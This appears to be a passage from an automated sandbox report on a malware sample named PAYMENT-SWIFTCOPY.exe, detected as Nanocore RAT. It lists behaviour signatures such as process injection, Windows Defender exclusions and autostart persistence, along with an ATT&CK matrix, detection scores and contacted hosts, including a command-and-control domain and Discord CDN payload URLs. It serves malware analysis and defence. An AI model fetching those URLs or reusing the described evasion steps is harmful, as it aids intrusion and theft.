              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,3_2_0040A272

              Lowering of HIPS / PFW / Operating System Security Settings:

              barindex
              Changes security center settings (notifications, updates, antivirus, firewall)Show sources
              Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
              Source: svchost.exe, 0000000B.00000002.575218736.0000025EE7240000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: svchost.exe, 0000000B.00000002.574784938.0000025EE7213000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

              Stealing of Sensitive Information:

              barindex
              Yara detected Nanocore RATShow sources
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.582925885.0000000003171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.590978202.00000000067E0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.588590470.0000000004171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTR

              Remote Access Functionality:

              barindex
              Detected Nanocore RatShow sources
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
              Yara detected Nanocore RATShow sources
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.582925885.0000000003171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.590978202.00000000067E0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.588590470.0000000004171000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1Startup Items1Startup Items1Disable or Modify Tools211OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API1DLL Side-Loading1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter1Application Shimming1DLL Side-Loading1Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery341SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsScheduled Task/Job1Windows Service1Application Shimming1DLL Side-Loading1NTDSVirtualization/Sandbox Evasion141Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsService Execution2Scheduled Task/Job1Access Token Manipulation1Masquerading221LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRegistry Run Keys / Startup Folder321Windows Service1Virtualization/Sandbox Evasion141Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsProcess Injection112Access Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1Process Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)Registry Run Keys / Startup Folder321Masquerading/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 509580 Sample: PAYMENT-SWIFTCOPY.exe Startdate: 26/10/2021 Architecture: WINDOWS Score: 100 56 doc-file.ddns.net 194.5.98.32, 49760, 49766, 49767 DANILENKODE Netherlands 2->56 58 162.159.129.233, 443, 49759, 49763 CLOUDFLARENETUS United States 2->58 60 2 other IPs or domains 2->60 70 Malicious sample detected (through community Yara rule) 2->70 72 System process connects to network (likely due to code injection or exploit) 2->72 74 Multi AV Scanner detection for dropped file 2->74 76 17 other signatures 2->76 9 PAYMENT-SWIFTCOPY.exe 24 11 2->9         started        14 svchost.exe 2->14         started        16 svchost.exe 9 1 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 64 cdn.discordapp.com 162.159.130.233, 443, 49745, 49746 CLOUDFLARENETUS United States 9->64 48 C:\Windows\Cursors\...\svchost.exe, PE32 9->48 dropped 50 C:\Users\user\AppData\...\???????????????.exe, PE32 9->50 dropped 52 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->52 dropped 54 2 other files (1 malicious) 9->54 dropped 80 Creates autostart registry keys with suspicious names 9->80 82 Drops PE files to the startup folder 9->82 84 Creates an autostart registry key pointing to binary in C:\Windows 9->84 88 3 other signatures 9->88 20 ???????????????.exe 9->20         started        25 AdvancedRun.exe 1 9->25         started        27 powershell.exe 9->27         started        29 7 other processes 9->29 86 Changes security center settings (notifications, updates, antivirus, firewall) 14->86 66 127.0.0.1 unknown unknown 16->66 file6 signatures7 process8 dnsIp9 62 cdn.discordapp.com 20->62 46 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 20->46 dropped 78 Adds a directory exclusion to Windows Defender 20->78 31 AdvancedRun.exe 25->31         started        34 conhost.exe 27->34         started        36 conhost.exe 29->36         started        38 conhost.exe 29->38         started        40 conhost.exe 29->40         started        42 conhost.exe 29->42         started        file10 signatures11 process12 dnsIp13 68 192.168.2.1 unknown unknown 31->68 44 conhost.exe 31->44         started        process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PAYMENT-SWIFTCOPY.exe25%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              PAYMENT-SWIFTCOPY.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Windows\Cursors\???????????????\svchost.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe3%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe3%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe0%ReversingLabs
              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe25%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              C:\Windows\Cursors\???????????????\svchost.exe25%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://tempuri.org/DetailsDataSet1.xsd0%Avira URL Cloudsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
              https://sectigo.com/CPS0C0%URL Reputationsafe
              https://sectigo.com/CPS0D0%URL Reputationsafe
              http://www.bingmapsportal.comsv0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              https://%s.xboxlive.com0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
              https://dynamic.t0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
              https://%s.dnet.xboxlive.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              doc-file.ddns.net
              194.5.98.32
              truefalse
                high
                cdn.discordapp.com
                162.159.130.233
                truefalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://cdn.discordapp.com/attachments/893177342426509335/902539097346814013/779A1864.jpgfalse
                    high
                    https://cdn.discordapp.com/attachments/893177342426509335/902539094427578399/0CFA97D5.jpgfalse
                      high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://tempuri.org/DetailsDataSet1.xsdPAYMENT-SWIFTCOPY.exe, 00000000.00000000.352617039.0000000000832000.00000002.00020000.sdmp, ???????????????.exe, 00000016.00000000.303619783.0000000000AF2000.00000002.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.sectigo.com0PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000008.00000003.313216317.000001F314847000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpfalse
                                    high
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000008.00000003.313162341.000001F31485E000.00000004.00000001.sdmpfalse
                                        high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000008.00000003.289191177.000001F314832000.00000004.00000001.sdmpfalse
                                          high
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpfalse
                                            high
                                            https://sectigo.com/CPS0CPAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://sectigo.com/CPS0DPAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.bingmapsportal.comsvsvchost.exe, 00000008.00000002.316396681.000001F314813000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePAYMENT-SWIFTCOPY.exe, 00000000.00000000.354192498.0000000002BB1000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sPAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://cdn.discordapp.comPAYMENT-SWIFTCOPY.exe, 00000000.00000000.354192498.0000000002BB1000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000008.00000002.316396681.000001F314813000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.318785440.000001F31483D000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://%s.xboxlive.comsvchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  low
                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000008.00000003.313216317.000001F314847000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000008.00000003.289191177.000001F314832000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tPAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://dynamic.tsvchost.exe, 00000008.00000002.323889556.000001F314865000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.313192005.000001F314840000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.313162341.000001F31485E000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000008.00000003.289191177.000001F314832000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://activity.windows.comsvchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000008.00000003.313111037.000001F314861000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://%s.dnet.xboxlive.comsvchost.exe, 00000006.00000002.575370087.0000027FE8043000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        low
                                                                                        https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000008.00000003.313177364.000001F314859000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000008.00000003.313162341.000001F31485E000.00000004.00000001.sdmpfalse
                                                                                            high

                                                                                            Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            194.5.98.32
                                                                                            doc-file.ddns.netNetherlands
                                                                                            208476DANILENKODEfalse
                                                                                            162.159.130.233
                                                                                            cdn.discordapp.comUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            162.159.129.233
                                                                                            unknownUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            162.159.135.233
                                                                                            unknownUnited States
                                                                                            13335CLOUDFLARENETUSfalse

                                                                                            Private

                                                                                            IP
                                                                                            192.168.2.1
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                                                            Analysis ID:509580
                                                                                            Start date:26.10.2021
                                                                                            Start time:17:33:14
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 15m 32s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:PAYMENT-SWIFTCOPY.exe
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:80
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.adwa.expl.evad.winEXE@97/44@13/6
                                                                                            EGA Information:Failed
                                                                                            HDC Information:
                                                                                            • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                            • Quality average: 83%
                                                                                            • Quality standard deviation: 25.9%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 66%
                                                                                            • Number of executed functions: 42
                                                                                            • Number of non-executed functions: 170
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Found application associated with file extension: .exe
                                                                                            Warnings:
                                                                                            Show All
                                                                                            • Exclude process from analysis (whitelisted): RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 20.189.173.20, 20.42.73.29, 52.182.143.212, 52.168.117.173
